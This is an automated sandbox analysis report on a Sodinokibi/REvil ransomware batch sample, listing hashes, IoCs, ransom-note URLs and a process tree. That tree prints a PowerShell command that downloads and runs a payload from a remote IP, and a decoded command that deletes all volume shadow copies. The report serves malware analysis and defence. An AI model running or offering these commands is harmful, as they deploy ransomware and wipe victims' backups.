Analysis
- max time kernel: 87s
- max time network: 98s
- platform: windows7_x64
- resource: win7v200430
- submitted: 15-05-2020 20:10

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: d4a380d12c8f386aeaa2ab8a1f33067f.bat, Resource: win7v200430)
- Behavioral task: behavioral2 (Sample: d4a380d12c8f386aeaa2ab8a1f33067f.bat, Resource: win10v200430)
General
- Target: d4a380d12c8f386aeaa2ab8a1f33067f.bat
- Size: 218B
- MD5: 67895090003d0e397d064545c799e1b7
- SHA1: b1864fd30e1c39495ed72a9cdf4744446233cc4d
- SHA256: 3c3e7899e6b30a6296d9e7e6a4c25ac2bdd7aa646176afbea2c2dc5198c2874e
- SHA512: 3492801a8dda9940ad6fdc7d76d3bd876fa7bf0ed30a62b8113ae39f460eeb7d28ff3b1db77b8c9dc61880be1c2137c1c3e68be77f1f6101741e5054599458de
Malware Config
- Extracted from: http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f
- Extracted from: C:\m4s23m-readme.txt
  - Family: sodinokibi
  - URLs:
    - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/48B8DFF1F3BFE3B2
    - http://decryptor.cc/48B8DFF1F3BFE3B2
Signatures

- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 1296 (cmd.exe) wrote to memory of PID 1328 (powershell.exe)
  - PID 1328 (powershell.exe) wrote to memory of PID 556 (powershell.exe), reported 4 times
- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe (PID 1328), powershell.exe (PID 556)
  All 77 hits are attributed to these two powershell.exe processes, the large majority to PID 1328.
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Drops file in Program Files directory (15 IoCs)
  Processes: powershell.exe (all entries below)
  - File opened for modification: \??\c:\program files\PushExit.eps
  - File opened for modification: \??\c:\program files\SuspendSync.aifc
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\m4s23m-readme.txt
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\m4s23m-readme.txt
  - File created: \??\c:\program files\m4s23m-readme.txt
  - File opened for modification: \??\c:\program files\AddSplit.png
  - File opened for modification: \??\c:\program files\LimitInstall.emf
  - File opened for modification: \??\c:\program files\ProtectUnblock.mpg
  - File created: \??\c:\program files (x86)\m4s23m-readme.txt
  - File created: \??\c:\program files\microsoft sql server compact edition\m4s23m-readme.txt
  - File opened for modification: \??\c:\program files\EnterEnable.mpv2
  - File opened for modification: \??\c:\program files\ReceiveRestart.m4v
  - File opened for modification: \??\c:\program files\CheckpointNew.3gp
  - File opened for modification: \??\c:\program files\CompleteRepair.vbe
  - File opened for modification: \??\c:\program files\SkipRequest.raw
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7q9buxi.bmp" (powershell.exe)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe (PID 1328)
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe (PID 1328, flow 1)
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 1328 powershell.exe (reported twice)
  - Token: SeDebugPrivilege, PID 556 powershell.exe
  - Token: SeBackupPrivilege, PID 1836 vssvc.exe
  - Token: SeRestorePrivilege, PID 1836 vssvc.exe
  - Token: SeAuditPrivilege, PID 1836 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 1328 powershell.exe
Processes

- [depth 1] C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\d4a380d12c8f386aeaa2ab8a1f33067f.bat"
  PID: 1296
  Signatures:
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d4a380d12c8f386aeaa2ab8a1f33067f');Invoke-YRZYGKQZCZH;Start-Sleep -s 10000"
    PID: 1328
    Signatures:
    - Suspicious use of WriteProcessMemory
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Blacklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    - [depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      The -e argument is base64 of a UTF-16LE string and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      This is the volume shadow copy deletion step, which accounts for the vssvc.exe activity (service keys under VSS\Diag and the SeBackupPrivilege/SeRestorePrivilege tokens) recorded above.
      PID: 556
      Signatures:
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

- [depth 1] C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1836
  Signatures:
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken